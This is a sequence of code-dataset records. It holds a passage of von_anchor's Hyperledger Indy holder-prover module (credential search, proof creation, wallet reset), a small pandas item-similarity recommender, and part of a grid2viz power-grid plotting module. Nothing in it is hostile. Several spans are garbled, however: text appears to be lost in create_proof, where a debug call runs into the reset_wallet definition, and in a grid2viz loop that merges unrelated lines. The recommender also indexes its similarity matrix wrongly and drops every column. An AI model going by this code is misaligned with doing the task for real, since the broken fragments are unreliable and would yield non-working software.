Note that\n util.proof_req_attr_referents() maps cred defs and attr names to proof req item referents,\n bridging the gap between attribute names and their corresponding item referents.\n\n :param proof_req_json: proof request as per get_creds(); e.g.,\n\n ::\n\n {\n \"nonce\": \"1532429687\",\n \"name\": \"proof_req\",\n \"version\": \"0.0\",\n \"requested_predicates\": {},\n \"requested_attributes\": {\n \"17_name_uuid\": {\n \"restrictions\": [\n {\n \"cred_def_id\": \"LjgpST2rjsoxYegQDRm7EL:3:CL:17:0\"\n }\n ],\n \"name\": \"name\"\n },\n \"17_thing_uuid\": {\n \"restrictions\": [\n {\n \"cred_def_id\": \"LjgpST2rjsoxYegQDRm7EL:3:CL:17:0\"\n }\n ],\n \"name\": \"thing\"\n }\n }\n }\n\n :param x_queries_json: json list of extra queries to apply to proof request attribute and predicate\n referents; e.g.,\n\n ::\n {\n \"17_thing_uuid\": { # require attr presence on name 'thing', cred def id from proof req above\n \"$or\": [\n {\n \"attr::name::value\": \"J.R. 'Bob' Dobbs\"\n },\n {\n \"attr::thing::value\": \"slack\"\n },\n ]\n },\n }\n\n :return: tuple with set of wallet cred ids, json list of cred briefs;\n e.g.,\n\n ::\n (\n {\n 'b42ce5bc-b690-43cd-9493-6fe86ad25e85',\n 'd773434a-0080-4e3e-a03b-f2033eae7d75'\n },\n '[\n {\n \"interval\": null,\n \"cred_info\": {\n \"schema_id\": \"LjgpST2rjsoxYegQDRm7EL:2:non-revo:1.0\",\n \"rev_reg_id\": null,\n \"attrs\": {\n \"name\": \"Chicken Hawk\",\n \"thing\": \"chicken\"\n },\n \"cred_rev_id\": null,\n \"referent\": \"d773434a-0080-4e3e-a03b-f2033eae7d75\",\n \"cred_def_id\": \"LjgpST2rjsoxYegQDRm7EL:3:CL:17:0\"\n }\n },\n {\n \"interval\": null,\n \"cred_info\": {\n \"schema_id\": \"LjgpST2rjsoxYegQDRm7EL:2:non-revo:1.0\",\n \"rev_reg_id\": null,\n \"attrs\": {\n \"name\": \"J.R. \\\"Bob\\\" Dobbs\",\n \"thing\": \"slack\"\n },\n \"cred_rev_id\": null,\n \"referent\": \"b42ce5bc-b690-43cd-9493-6fe86ad25e85\",\n \"cred_def_id\": \"LjgpST2rjsoxYegQDRm7EL:3:CL:17:0\"\n }\n }\n ]'\n }\n \"\"\"\n\n LOGGER.debug(\n ('HolderProver.get_cred_briefs_by_proof_req_query >>> proof_req_json: %s, x_queries_json: %s'),\n proof_req_json,\n x_queries_json)\n\n rv = None\n\n x_queries = json.loads(x_queries_json or '{}')\n for k in x_queries:\n x_queries[k] = canon_wql(x_queries[k]) # indy-sdk requires attr name canonicalization\n\n handle = await anoncreds.prover_search_credentials_for_proof_req(\n self.wallet.handle,\n proof_req_json,\n json.dumps(x_queries) if x_queries else None)\n briefs = []\n cred_ids = set()\n proof_req = json.loads(proof_req_json)\n\n try:\n for item_referent in (x_queries\n if x_queries\n else {**proof_req['requested_attributes'], **proof_req['requested_predicates']}):\n count = Wallet.DEFAULT_CHUNK\n while count == Wallet.DEFAULT_CHUNK:\n fetched = json.loads(await anoncreds.prover_fetch_credentials_for_proof_req(\n handle,\n item_referent,\n Wallet.DEFAULT_CHUNK))\n count = len(fetched)\n for brief in fetched:\n if brief['cred_info']['referent'] not in cred_ids:\n cred_ids.add(brief['cred_info']['referent'])\n briefs.append(brief)\n finally:\n await anoncreds.prover_close_credentials_search_for_proof_req(handle)\n\n rv = (cred_ids, json.dumps(briefs))\n LOGGER.debug('HolderProver.get_cred_briefs_by_proof_req_query <<< %s', rv)\n return rv\n\n\n async def create_proof(self, proof_req: dict, creds: Union[dict, list], requested_creds: dict) -> str:\n \"\"\"\n Create proof as HolderProver.\n\n Raise:\n * AbsentLinkSecret if link secret not set\n * CredentialFocus on attempt to create proof on no creds or multiple creds for a credential 
definition\n * AbsentTails if missing required tails file\n * BadRevStateTime if a timestamp for a revocation registry state in the proof request\n occurs before revocation registry creation\n * IndyError for any other indy-sdk error.\n * AbsentInterval if creds missing non-revocation interval, but cred def supports revocation\n\n :param proof_req: proof request as per get_creds() above\n :param creds: credentials to prove: indy-sdk creds structure or list of cred-briefs\n :param requested_creds: data structure with self-attested attribute info, requested attribute info\n and requested predicate info, assembled from get_creds() and filtered for content of interest. I.e.,\n\n ::\n\n {\n 'self_attested_attributes': {},\n 'requested_attributes': {\n 'attr0_uuid': {\n 'cred_id': string,\n 'timestamp': integer, # for revocation state\n 'revealed': bool\n },\n ...\n },\n 'requested_predicates': {\n 'predicate0_uuid': {\n 'cred_id': string,\n 'timestamp': integer # for revocation state\n }\n }\n }\n\n :return: proof json\n \"\"\"\n\n LOGGER.debug(\n 'HolderProver.create_proof >>> proof_req: %s, creds: %s, requested_creds: %s',\n proof_req,\n creds,\n requested_creds)\n\n self._assert_link_secret('create_proof')\n\n if isinstance(creds, dict):\n x_uuids = [attr_uuid for attr_uuid in creds['attrs'] if len(creds['attrs'][attr_uuid]) != 1]\n if x_uuids:\n LOGGER.debug('HolderProver.create_proof: int(time()):\n LOGGER.debug(\n 'HolderProver.create_proof: str:\n \"\"\"\n Close and delete HolderProver wallet, then create and open a replacement on prior link secret.\n Note that this operation effectively destroys private keys for credential definitions. Its\n intended use is primarily for testing and demonstration.\n\n Raise AbsentLinkSecret if link secret not set.\n\n :return: wallet name\n \"\"\"\n\n LOGGER.debug('HolderProver.reset_wallet >>>')\n\n self._assert_link_secret('reset_wallet')\n\n seed = self.wallet._seed\n wallet_name = self.wallet.name\n wallet_auto_remove = self.wallet.auto_remove\n wallet_cfg = self.wallet.cfg\n wallet_cfg['auto-remove'] = wallet_auto_remove\n wallet_xtype = self.wallet.xtype\n wallet_access_creds = self.wallet.access_creds\n\n await self.wallet.close()\n if not self.wallet.auto_remove:\n await self.wallet.remove()\n self.wallet = await Wallet(\n seed,\n wallet_name,\n wallet_xtype,\n wallet_cfg,\n wallet_access_creds).create()\n await self.wallet.open()\n\n await self.create_link_secret(self._link_secret) # carry over link secret to new wallet\n\n rv = self.wallet.name\n LOGGER.debug('HolderProver.reset_wallet <<< %s', rv)\n return rv\n", "repo_name": "AlwaysFurther/von_anchor", "sub_path": "von_anchor/anchor/holder_prover.py", "file_name": "holder_prover.py", "file_ext": "py", "file_size_in_byte": 58368, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 40, "usage_type": "call"}, {"api_name": "von_anchor.anchor.base._BaseAnchor", "line_number": 43, "usage_type": "name"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 50, "usage_type": "name"}, {"api_name": "von_anchor.nodepool.NodePool", "line_number": 50, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 72, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 73, "usage_type": "call"}, {"api_name": "von_anchor.validate_config.validate_config", "line_number": 76, "usage_type": "call"}, {"api_name": 
"os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 78, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 79, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentLinkSecret", "line_number": 92, "usage_type": "call"}, {"api_name": "von_anchor.validate_config.validate_config", "line_number": 113, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_rev_reg_id", "line_number": 138, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 140, "usage_type": "call"}, {"api_name": "von_anchor.util.rev_reg_id2cred_def_id_tag", "line_number": 142, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 145, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentCredDef", "line_number": 146, "usage_type": "name"}, {"api_name": "von_anchor.error.AbsentCredDef", "line_number": 149, "usage_type": "call"}, {"api_name": "von_anchor.error.ClosedPool", "line_number": 150, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.lock", "line_number": 153, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 153, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.get", "line_number": 154, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 154, "usage_type": "name"}, {"api_name": "von_anchor.tails.Tails", "line_number": 158, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentTails", "line_number": 159, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 162, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails.dir", "line_number": 162, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 162, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 163, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentTails", "line_number": 165, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails.associate", "line_number": 166, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 166, "usage_type": "name"}, {"api_name": "von_anchor.tails.Tails", "line_number": 167, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 170, "usage_type": "name"}, {"api_name": "von_anchor.cache.RevoCacheEntry", "line_number": 170, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 172, "usage_type": "name"}, {"api_name": "von_anchor.util.ok_rev_reg_id", "line_number": 199, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 201, "usage_type": "call"}, {"api_name": "indy.ledger.build_get_revoc_reg_delta_request", "line_number": 206, "usage_type": "call"}, {"api_name": "indy.ledger", "line_number": 206, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 208, "usage_type": "call"}, {"api_name": "indy.ledger.parse_get_revoc_reg_delta_response", "line_number": 212, "usage_type": "call"}, {"api_name": "indy.ledger", "line_number": 212, "usage_type": "name"}, {"api_name": "indy.error.IndyError", "line_number": 213, "usage_type": "name"}, {"api_name": "von_anchor.error.AbsentRevReg", "line_number": 215, "usage_type": "call"}, {"api_name": "von_anchor.error.BadRevStateTime", "line_number": 221, "usage_type": "call"}, {"api_name": "indy.anoncreds.issuer_merge_revocation_registry_deltas", "line_number": 224, "usage_type": "call"}, {"api_name": "indy.anoncreds", 
"line_number": 224, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 225, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_cred_def_id", "line_number": 302, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 304, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 307, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentCredDef", "line_number": 308, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 358, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_rev_reg_id", "line_number": 372, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 374, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails.dir", "line_number": 376, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 376, "usage_type": "name"}, {"api_name": "von_anchor.cache.Caches.parse", "line_number": 393, "usage_type": "call"}, {"api_name": "von_anchor.cache.Caches", "line_number": 393, "usage_type": "name"}, {"api_name": "von_anchor.tails.Tails.links", "line_number": 395, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 395, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 396, "usage_type": "call"}, {"api_name": "von_anchor.cache.Caches.purge_archives", "line_number": 413, "usage_type": "call"}, {"api_name": "von_anchor.cache.Caches", "line_number": 413, "usage_type": "name"}, {"api_name": "von_anchor.tails.Tails.links", "line_number": 416, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 416, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 417, "usage_type": "call"}, {"api_name": "von_anchor.error.ClosedPool", "line_number": 420, "usage_type": "name"}, {"api_name": "von_anchor.tails.Tails.links", "line_number": 435, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 435, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 436, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 438, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails.links", "line_number": 438, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 438, "usage_type": "name"}, {"api_name": "von_anchor.util.ok_cred_def_id", "line_number": 478, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 480, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 483, "usage_type": "call"}, {"api_name": "von_anchor.error.ClosedPool", "line_number": 484, "usage_type": "name"}, {"api_name": "von_anchor.error.CacheIndex", "line_number": 486, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE.lock", "line_number": 490, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 490, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.dflt_interval", "line_number": 491, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 491, "usage_type": "name"}, {"api_name": "von_anchor.error.CacheIndex", "line_number": 496, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_create_master_secret", "line_number": 515, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 515, "usage_type": "name"}, {"api_name": "indy.error.IndyError", "line_number": 516, "usage_type": "name"}, {"api_name": "indy.error.ErrorCode.AnoncredsMasterSecretDuplicateNameError", "line_number": 517, "usage_type": 
"attribute"}, {"api_name": "indy.error.ErrorCode", "line_number": 517, "usage_type": "name"}, {"api_name": "von_anchor.util.ok_cred_def_id", "line_number": 542, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 544, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 550, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 552, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentSchema", "line_number": 557, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_create_credential_req", "line_number": 558, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 558, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 585, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_store_credential", "line_number": 593, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 593, "usage_type": "name"}, {"api_name": "time.time", "line_number": 617, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 618, "usage_type": "call"}, {"api_name": "von_anchor.cache.SCHEMA_CACHE.lock", "line_number": 620, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.SCHEMA_CACHE", "line_number": 620, "usage_type": "name"}, {"api_name": "von_anchor.cache.CRED_DEF_CACHE.lock", "line_number": 623, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.CRED_DEF_CACHE", "line_number": 623, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.lock", "line_number": 627, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 627, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.get", "line_number": 628, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 628, "usage_type": "name"}, {"api_name": "von_anchor.error.ClosedPool", "line_number": 632, "usage_type": "name"}, {"api_name": "von_anchor.cache.Caches.archive", "line_number": 641, "usage_type": "call"}, {"api_name": "von_anchor.cache.Caches", "line_number": 641, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 683, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails.links", "line_number": 683, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 683, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 687, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 687, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 691, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 692, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 692, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_cred_def_id", "line_number": 692, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 695, "usage_type": "call"}, {"api_name": "von_anchor.util.cred_def_id2seq_no", "line_number": 695, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 699, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 699, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 705, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 705, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 709, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_search_credentials", "line_number": 775, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 775, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 777, "usage_type": "call"}, {"api_name": 
"von_anchor.codec.canon_wql", "line_number": 777, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 777, "usage_type": "call"}, {"api_name": "von_anchor.wallet.Wallet.DEFAULT_CHUNK", "line_number": 778, "usage_type": "attribute"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 778, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 783, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_fetch_credentials", "line_number": 783, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 783, "usage_type": "name"}, {"api_name": "indy.anoncreds.prover_close_credentials_search", "line_number": 790, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 790, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 792, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_get_credentials", "line_number": 838, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 838, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 838, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_get_credential", "line_number": 872, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 872, "usage_type": "name"}, {"api_name": "indy.error.IndyError", "line_number": 873, "usage_type": "name"}, {"api_name": "indy.error.ErrorCode.WalletItemNotFound", "line_number": 874, "usage_type": "attribute"}, {"api_name": "indy.error.ErrorCode", "line_number": 874, "usage_type": "name"}, {"api_name": "von_anchor.error.AbsentCred", "line_number": 879, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_get_credentials_for_proof_req", "line_number": 1003, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1003, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1004, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 1010, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentCredDef", "line_number": 1011, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1042, "usage_type": "call"}, {"api_name": "von_anchor.util.prune_creds_json", "line_number": 1042, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 1044, "usage_type": "call"}, {"api_name": "typing.Set", "line_number": 891, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1157, "usage_type": "call"}, {"api_name": "von_anchor.codec.canon_wql", "line_number": 1159, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_search_credentials_for_proof_req", "line_number": 1161, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1161, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 1164, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 1167, "usage_type": "call"}, {"api_name": "von_anchor.wallet.Wallet.DEFAULT_CHUNK", "line_number": 1173, "usage_type": "attribute"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 1173, "usage_type": "name"}, {"api_name": "von_anchor.wallet.Wallet.DEFAULT_CHUNK", "line_number": 1174, "usage_type": "attribute"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 1174, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1175, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_fetch_credentials_for_proof_req", "line_number": 1175, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1175, "usage_type": "name"}, {"api_name": "von_anchor.wallet.Wallet.DEFAULT_CHUNK", "line_number": 1178, "usage_type": "attribute"}, {"api_name": 
"von_anchor.wallet.Wallet", "line_number": 1178, "usage_type": "name"}, {"api_name": "indy.anoncreds.prover_close_credentials_search_for_proof_req", "line_number": 1185, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1185, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 1187, "usage_type": "call"}, {"api_name": "typing.Set", "line_number": 1051, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 1192, "usage_type": "name"}, {"api_name": "von_anchor.error.CredentialFocus", "line_number": 1245, "usage_type": "call"}, {"api_name": "von_anchor.error.CredentialFocus", "line_number": 1256, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_schema_id", "line_number": 1267, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 1269, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 1272, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentSchema", "line_number": 1277, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_cred_def_id", "line_number": 1282, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 1284, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 1287, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_rev_reg_id", "line_number": 1292, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 1294, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1299, "usage_type": "call"}, {"api_name": "von_anchor.error.BadRevStateTime", "line_number": 1304, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentInterval", "line_number": 1312, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE.lock", "line_number": 1318, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 1318, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.get", "line_number": 1320, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 1320, "usage_type": "name"}, {"api_name": "von_anchor.error.AbsentTails", "line_number": 1324, "usage_type": "call"}, {"api_name": "indy.anoncreds.create_revocation_state", "line_number": 1330, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1330, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1337, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_create_proof", "line_number": 1340, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1340, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 1342, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 1343, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 1345, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 1346, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 1347, "usage_type": "call"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 1377, "usage_type": "call"}]}
+{"seq_id": "41052188160", "text": "import pandas as pd\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n# Load the dataset containing customer purchase history\ndataset = pd.read_csv('customer_purchase_history.csv')\n\n# Perform data preprocessing and feature engineering\n# ...\n\n# Create a user-item matrix\nuser_item_matrix = dataset.pivot_table(index='CustomerID', columns='ProductID', values='PurchaseCount')\n\n# Calculate item-item similarity matrix using cosine similarity\nitem_similarity = cosine_similarity(user_item_matrix.fillna(0))\n\n# Function to generate personalized recommendations for a given user\ndef generate_recommendations(user_id, top_n):\n user_ratings = user_item_matrix.loc[user_id]\n similar_items = pd.Series(0, index=user_item_matrix.columns)\n \n # Calculate the weighted average of item ratings based on similarity scores\n for item_id, rating in user_ratings.iteritems():\n similar_items += item_similarity[item_id] * rating\n \n # Exclude items already purchased by the user\n similar_items = similar_items.drop(user_ratings.index)\n \n # Sort items based on their weighted ratings\n top_items = similar_items.sort_values(ascending=False).head(top_n)\n \n return top_items.index.tolist()\n\n# Generate personalized recommendations for a specific user\nuser_id = '12345'\ntop_n = 5\nrecommendations = generate_recommendations(user_id, top_n)\n\n# Print the recommended product IDs\nprint(f\"Recommended Products for User {user_id}:\")\nfor product_id in recommendations:\n print(product_id)\n", "repo_name": "syed-bot/midterm2023", "sub_path": "model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1509, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "sklearn.metrics.pairwise.cosine_similarity", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "42951645536", "text": "import configparser\nimport itertools\nimport json\nimport os\nimport time\nfrom pathlib import Path\nimport pickle\nimport gzip\n\nfrom colorama import Fore, Style\nimport dill\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport plotly.graph_objects as go\nfrom scipy.spatial import ConvexHull\nfrom grid2op.Episode import EpisodeData\nfrom grid2op.PlotGrid import PlotPlotly, PlotMatplot\n\nfrom grid2viz.src.kpi.EpisodeAnalytics import EpisodeAnalytics\n\n# refer to https://github.com/rte-france/Grid2Op/blob/master/getting_started/8_PlottingCapabilities.ipynb for better usage\n\ngraph = None\ngraph_matplotlib = None\n\n\n# TODO: addSubstationColor - integrate that into grid2op Plotgrid\ndef add_substation_color_matplot(subs, plot_helper, fig):\n radius_size = plot_helper._sub_radius\n # fig = plot_helper.plot_layout()\n ax = fig.gca()\n\n for id_sub in subs:\n subName = \"sub_\" + str(id_sub)\n x, y = plot_helper._grid_layout[subName]\n circle = plt.Circle((x, y), int(radius_size), color=\"gold\")\n ax.add_artist(circle)\n\n return fig\n\n\ndef add_substation_color_plotly(subs, plot_helper, fig, color=\"gold\"):\n radius_size = int(plot_helper._sub_radius * 0.8)\n\n for id_sub in subs:\n subName = \"sub_\" + str(id_sub)\n x_center, y_center = plot_helper._grid_layout[subName]\n\n marker_dict = dict(\n size=radius_size,\n color=color,\n showscale=False,\n opacity=0.5,\n )\n fig.add_trace(\n go.Scatter(\n x=[x_center],\n y=[y_center],\n mode=\"markers\",\n text=[subName],\n name=\"sub\" + subName,\n marker=marker_dict,\n showlegend=False,\n )\n )\n return fig\n\ndef add_alarm_area_plotly(line_subs, plot_helper, fig, color=\"gold\"):\n\n x=[]\n y=[]\n for id_sub in line_subs:\n subName = \"sub_\" + str(id_sub)\n x_center, y_center = plot_helper._grid_layout[subName]\n x.append(x_center)\n y.append(y_center)\n\n points = [[lx, ly] for lx, ly in zip(x, y)]\n hull = ConvexHull(points)\n hull_vertices_x = [x[i] for i in hull.vertices]\n hull_vertices_y = [y[i] for i in hull.vertices]\n fig.add_trace(go.Scatter(\n x=hull_vertices_x,\n y=hull_vertices_y,\n marker=dict(color=color, size=2),\n mode=\"markers\",\n # name=\"Women\",\n fill=\"toself\",\n opacity=0.5\n ))\n return fig\n\n\n\ndef make_network(episode, responsive=True):\n \"\"\"\n Create a Plotly network graph with the layout configuration and the selected episode.\n\n :param episode: An episode containing targeted data for the graph.\n :return: Network graph\n \"\"\"\n global graph\n if graph is None:\n graph = PlotPlotly(\n grid_layout=episode.observation_space.grid_layout,\n observation_space=episode.observation_space,\n responsive=responsive,\n )\n return graph\n\n\ndef make_network_matplotlib(episode,timestep=0):\n global graph_matplotlib\n if graph_matplotlib is None:\n graph_matplotlib = PlotMatplot(\n grid_layout=episode.observation_space.grid_layout,\n observation_space=episode.observation_space,\n line_name=False,\n gen_name=False,\n load_name=False,\n )\n return graph_matplotlib\n\n\n######\n# we want a non responsive graph for now in agent_study\n# so we have to define it differently from the global graph in make_network that we don't use here\nimport base64\nimport io\ndef make_network_agent_study(episode, timestep, figure_obs=None, responsive=False,redraw=False):\n # subs_on_bus_2 = np.repeat(False, episode_data.observations[0].n_sub)\n #graph=None\n #if(isMatplotLib):########not working for now. 
Was trying to use matplotlib to accelerate plotting time\n # buf = io.BytesIO()\n # make_network_scenario_overview(episode,timestep=timestep)\n#\n#\n # # plt.figure(network_graph.number)\n # # plt.close(fig)\n # plt.savefig(buf, format=\"png\")\n # buf.seek(0)\n # #encoded_image = base64.b64encode(buf.read())\n#\n # #fig=encoded_image.decode()\n # data = base64.b64encode(buf.getbuffer()).decode(\"utf8\") # encode to html elements\n # buf.close()\n # return \"data:image/png;base64,{}\".format(data)\n\n observation=episode.observations[timestep]\n\n graph=make_network(episode, responsive)\n graph._sub_radius = 30 # instead of 25 by default\n graph._bus_radius = 10 # instead of 4 by default\n if(figure_obs)and not redraw:# don't redraw it from scratch, just change what is needed\n\n import plotly.colors as pc\n data_fig=figure_obs[\"data\"]#go.Figure(figure_obs)\n\n rho_lines=observation.rho\n n_lines=len(rho_lines)\n\n id_line=0\n i_traces=0\n previous_trace=None\n while id_line= 2\n ]\n fig = add_substation_color_plotly(\n sub_2buses, graph, fig, color=\"green\"\n ) # also other color for subs not in ref topo\n\n if (\"is_alarm\" in episode.action_data_table.columns):\n alarms_lines_area = episode.observations[timestep].alarms_lines_area\n\n light_colors_plotly = [\"lightcoral\", \"lightsalmon\", \"lightpink\"]\n n_colors = len(light_colors_plotly)\n\n if (episode.action_data_table.is_alarm[timestep]):\n\n alarm_zones = episode.action_data_table.alarm_zone[timestep]\n\n for i_zone,zone in enumerate(alarm_zones):\n id_lines_alarm = []\n for idx, line_name in enumerate(episode.observations[timestep].name_line):\n line_alarm_zones = alarms_lines_area[line_name]\n if(zone in line_alarm_zones):\n id_lines_alarm.append(idx)\n line_subs = 